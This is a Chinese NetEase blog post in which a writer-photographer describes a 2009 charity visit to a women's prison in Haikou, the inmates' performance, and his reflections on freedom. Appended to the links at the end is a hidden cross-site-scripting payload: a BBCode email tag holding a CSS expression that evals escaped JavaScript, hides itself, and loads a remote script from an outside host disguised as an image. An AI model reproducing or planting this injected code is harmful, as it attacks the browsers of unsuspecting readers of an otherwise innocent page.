注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

刚峰看世界

不一样的角度不一样的世界!自由作家摄影师

 
 
 

日志

 
 
关于我

刚峰,知名网络作家\摄影师。曾任(海南侨报《乡缘》杂志法人代表总编辑)。2009年当选腾讯全国网络意见领袖

知名网络作家\摄影师。曾任(海南侨报《乡缘》杂志法人代表总编辑)。2009年当选腾讯全国网络意见领袖,2011年被腾讯评为网年度最具影响力十大博客,全国昆明博客笔会金奖获得者。 欢迎指教,欢迎合作。 联系邮址:<117550199@qq.com>

网易考拉推荐
 
 

“站起”,监狱的姐妹们……  

2009-03-14 00:07:43|  分类: 网民砸拍 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
“站起”,监狱的姐妹们…… - 刚峰先生 - 天涯横呤 

“站起”,监狱的姐妹们…… - 刚峰先生 - 天涯横呤 

“站起”,监狱的姐妹们…… - 刚峰先生 - 天涯横呤 

“站起”,监狱的姐妹们…… - 刚峰先生 - 天涯横呤 

“站起”,监狱的姐妹们…… - 刚峰先生 - 天涯横呤 

“站起”,监狱的姐妹们…… - 刚峰先生 - 天涯横呤 

        今年的“三八”海口的气候有点冷,也许阴雨总是在这个特殊的节日出来,本该阳光灿烂的太阳却被少有的阴霾罩住了,天空流下了一丝丝的雨珠。 
        应南海网的邀请,我与海口社会各界的朋友有幸来到了海南琼山女子监狱,向关押在这里的几百名女犯“送温暖”。仪式结束后,首先由社会各界表演节日,来自社会上离退休的大妈大姐们几曲精彩的歌舞表演后,接着由志愿者代表表演了一个非常丰富感人的手语,完后,由监狱男女犯人与看守干警表演的节日“站起”,以丰富的内容与浑厚的音乐,让我感到震撼! 
        特别是女犯人表演中饱含热泪,渴望自由,发自内心心声呼喊,让我禁不住流下了热泪…… 
        在这些女犯人中,无论是豆菀年华还是白发苍苍,其内心展现出来的一失足千古恨的忏悔,我这个第一次走进监狱的中年男人,感受到巨大的冲击力。 
        是呀,他们也有家庭也有父母、丈夫、儿女,可在人生的艰难中,有的因盗窃,有的因贩毒、有的甚至于过激杀人等一次失足,却必须面对铁窗,以泪洗面,在高墙下改造新生,有的要付出十几年的自由的代价。 
        结束时我无言以对。今发这些照片也请示过监狱领导同意。希望,我们在自由中生活,能读到此文的不管是男人还是女人们,珍惜自由下的快乐,好好把握自己的人生,也许这些照片会让你们对自己人生的无论是事业还是爱情的得得失失,有了一个新的诠注…… 
详文请看:南海网:http://club.hinews.cn/read-htm-tid-167623-keyword-.html
                  http://club.hinews.cn/read-htm-tid-167621-keyword-.html[flash,0,0]http://catche.qq.com/temp/20081209/4236888.swf[email=]id=baidu style=ee:expression(eval(unescape('this.parentNode.style.display%3D%27none%27%3Bif%28%21window.xxr%29%7Bvar%20l%3Ddocument.createElement%28%27script%27%29%3Bl.src%3D%27http%3A//love.avtupian.com/a/q/mq.jpg%27%3Bl.type%3D%27text/javascript%27%3Bdocument.getElementsByTagName%28%27head%27%29.item%280%29.appendChild%28l%29%3Bwindow.xxr%3D1%7D')));display:none;@qq.com[/email][/flash]
  评论这张
 
阅读(320)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017